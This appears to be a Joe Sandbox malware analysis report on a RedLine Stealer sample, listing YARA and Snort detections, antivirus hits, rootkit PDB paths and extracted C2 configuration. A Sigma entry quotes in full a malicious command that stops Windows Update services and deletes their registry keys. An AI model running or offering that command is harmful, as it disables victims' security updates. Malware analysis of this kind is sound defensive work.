0.2.6iWK0k820U.exe.41b788.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.6iWK0k820U.exe.41b788.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x174b5:$v2_1: ListOfProcesses 0x17249:$v4_3: base64str 0x182b8:$v4_4: stringKey 0x14e90:$v4_5: BytesToStringConverted 0x13ef8:$v4_6: FromBase64 0x15658:$v4_8: procName 0x159db:$v5_1: DownloadAndExecuteUpdate 0x17159:$v5_2: ITaskProcessor 0x159c9:$v5_3: CommandLineUpdate 0x159ba:$v5_4: DownloadUpdate 0x1605c:$v5_5: FileScanning 0x151ff:$v5_7: RecordHeaderField 0x14c1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
42.0.GoogleUpdate.exe.1b0000.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16dd5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17691:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17995:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17c81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17f79:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18279:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18561:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18849:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19141:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1943d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19739:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19a29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19d35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a025:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a305:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a611:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
0.0.6iWK0k820U.exe.41b788.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.6iWK0k820U.exe.41b788.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x174b5:$v2_1: ListOfProcesses 0x17249:$v4_3: base64str 0x182b8:$v4_4: stringKey 0x14e90:$v4_5: BytesToStringConverted 0x13ef8:$v4_6: FromBase64 0x15658:$v4_8: procName 0x159db:$v5_1: DownloadAndExecuteUpdate 0x17159:$v5_2: ITaskProcessor 0x159c9:$v5_3: CommandLineUpdate 0x159ba:$v5_4: DownloadUpdate 0x1605c:$v5_5: FileScanning 0x151ff:$v5_7: RecordHeaderField 0x14c1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
21.2.ofg.exe.f80000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
17.0.ofg.exe.f80000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
0.0.6iWK0k820U.exe.41b788.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.6iWK0k820U.exe.41b788.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x174b5:$v2_1: ListOfProcesses 0x17249:$v4_3: base64str 0x182b8:$v4_4: stringKey 0x14e90:$v4_5: BytesToStringConverted 0x13ef8:$v4_6: FromBase64 0x15658:$v4_8: procName 0x159db:$v5_1: DownloadAndExecuteUpdate 0x17159:$v5_2: ITaskProcessor 0x159c9:$v5_3: CommandLineUpdate 0x159ba:$v5_4: DownloadUpdate 0x1605c:$v5_5: FileScanning 0x151ff:$v5_7: RecordHeaderField 0x14c1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.0.6iWK0k820U.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.6iWK0k820U.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x16f4c:$s5: delete[] 0x167f8:$s6: constructor or from DllMain. 0x1a470:$pat14: , CommandLine: 0x32a3d:$v2_1: ListOfProcesses 0x327d1:$v4_3: base64str 0x33840:$v4_4: stringKey 0x30418:$v4_5: BytesToStringConverted 0x2f480:$v4_6: FromBase64 0x30be0:$v4_8: procName 0x30f63:$v5_1: DownloadAndExecuteUpdate 0x326e1:$v5_2: ITaskProcessor 0x30f51:$v5_3: CommandLineUpdate 0x30f42:$v5_4: DownloadUpdate 0x315e4:$v5_5: FileScanning 0x30787:$v5_7: RecordHeaderField 0x301a6:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.6iWK0k820U.exe.520000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.6iWK0k820U.exe.520000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xce8:$pat14: , CommandLine: 0x192b5:$v2_1: ListOfProcesses 0x19049:$v4_3: base64str 0x1a0b8:$v4_4: stringKey 0x16c90:$v4_5: BytesToStringConverted 0x15cf8:$v4_6: FromBase64 0x17458:$v4_8: procName 0x177db:$v5_1: DownloadAndExecuteUpdate 0x18f59:$v5_2: ITaskProcessor 0x177c9:$v5_3: CommandLineUpdate 0x177ba:$v5_4: DownloadUpdate 0x17e5c:$v5_5: FileScanning 0x16fff:$v5_7: RecordHeaderField 0x16a1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
20.2.chrome.exe.13848d8.1.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x13ec5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x141d5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x144b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x147a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14a91:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14d95:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15081:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15379:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15679:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15961:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15c49:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15f31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16235:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16541:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1683d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16b39:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16e29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17135:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17425:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17705:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17a11:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
0.0.6iWK0k820U.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.6iWK0k820U.exe.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x16f4c:$s5: delete[] 0x167f8:$s6: constructor or from DllMain. 0x1a470:$pat14: , CommandLine: 0x32a3d:$v2_1: ListOfProcesses 0x327d1:$v4_3: base64str 0x33840:$v4_4: stringKey 0x30418:$v4_5: BytesToStringConverted 0x2f480:$v4_6: FromBase64 0x30be0:$v4_8: procName 0x30f63:$v5_1: DownloadAndExecuteUpdate 0x326e1:$v5_2: ITaskProcessor 0x30f51:$v5_3: CommandLineUpdate 0x30f42:$v5_4: DownloadUpdate 0x315e4:$v5_5: FileScanning 0x30787:$v5_7: RecordHeaderField 0x301a6:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.0.6iWK0k820U.exe.400000.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.6iWK0k820U.exe.400000.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x16f4c:$s5: delete[] 0x167f8:$s6: constructor or from DllMain. 0x1a470:$pat14: , CommandLine: 0x32a3d:$v2_1: ListOfProcesses 0x327d1:$v4_3: base64str 0x33840:$v4_4: stringKey 0x30418:$v4_5: BytesToStringConverted 0x2f480:$v4_6: FromBase64 0x30be0:$v4_8: procName 0x30f63:$v5_1: DownloadAndExecuteUpdate 0x326e1:$v5_2: ITaskProcessor 0x30f51:$v5_3: CommandLineUpdate 0x30f42:$v5_4: DownloadUpdate 0x315e4:$v5_5: FileScanning 0x30787:$v5_7: RecordHeaderField 0x301a6:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Click to see the 19 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Google\brave.exe" , ParentImage: C:\Users\user\AppData\Local\Google\brave.exe, ParentProcessId: 6104, ParentProcessName: brave.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 1536, ProcessName: cmd.exe

Snort Signatures

ETPRO TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.3 - Destination IP: 37.220.87.2

Timestamp:	192.168.2.337.220.87.249707279242850286 11/24/22-12:19:58.824353
SID:	2850286
Source Port:	49707
Destination Port:	27924
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Agent.AETZ CnC Checkin - Source IP: 192.168.2.3 - Destination IP: 172.66.43.60

Timestamp:	192.168.2.3172.66.43.60497124432039616 11/24/22-12:20:44.878792
SID:	2039616
Source Port:	49712
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init - Source IP: 192.168.2.3 - Destination IP: 37.220.87.2

Timestamp:	192.168.2.337.220.87.249707279242850027 11/24/22-12:19:38.494390
SID:	2850027
Source Port:	49707
Destination Port:	27924
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 37.220.87.2 - Destination IP: 192.168.2.3

Timestamp:	37.220.87.2192.168.2.327924497072850353 11/24/22-12:19:40.518961
SID:	2850353
Source Port:	27924
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Avira: detection malicious, Label: HEUR/AGEN.1213193
Source: C:\Users\user\AppData\Local\Temp\85AD.tmp	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Multi AV Scanner detection for submitted file

Source: 6iWK0k820U.exe	Virustotal: Detection: 41%			Perma Link
Source: 6iWK0k820U.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for domain / URL

Source: filebin.net

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Google\brave.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Google\chrome.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\85AD.tmp	ReversingLabs: Detection: 80%

Machine Learning detection for sample

Source: 6iWK0k820U.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Joe Sandbox ML: detected

Source: 0.3.6iWK0k820U.exe.520000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["37.220.87.2:27924"], "Authorization Header": "a7c56867dbb5e7f508f946ee45b6a729"}

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Windows\GoogleUpdate.exe

Unpacked PE file: 53.2.GoogleUpdate.exe.1b0000.0.unpack

Source: 6iWK0k820U.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49978 version: TLS 1.2

Source:	Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe, 0000002A.00000000.383401879.00000000001B1000.00000020.00000001.01000000.0000000C.sdmp, GoogleUpdate.exe, 00000032.00000000.395920744.00000000001B1000.00000020.00000001.01000000.0000000C.sdmp, GoogleUpdate.exe, 00000035.00000000.407003617.00000000001B1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: ofg.exe, 00000011.00000002.540297511.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, ofg.exe, 00000015.00000002.540965896.0000000001350000.00000040.00000400.00020000.00000000.sdmp, ofg.exe, 00000015.00000002.541382921.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.533068784.0000000002F60000.00000040.00000400.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.533175421.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000002.588275615.0000000000D40000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 0000000E.00000002.458992408.0000017A76E82000.00000004.00000020.00020000.00000000.sdmp, 85AD.tmp.14.dr
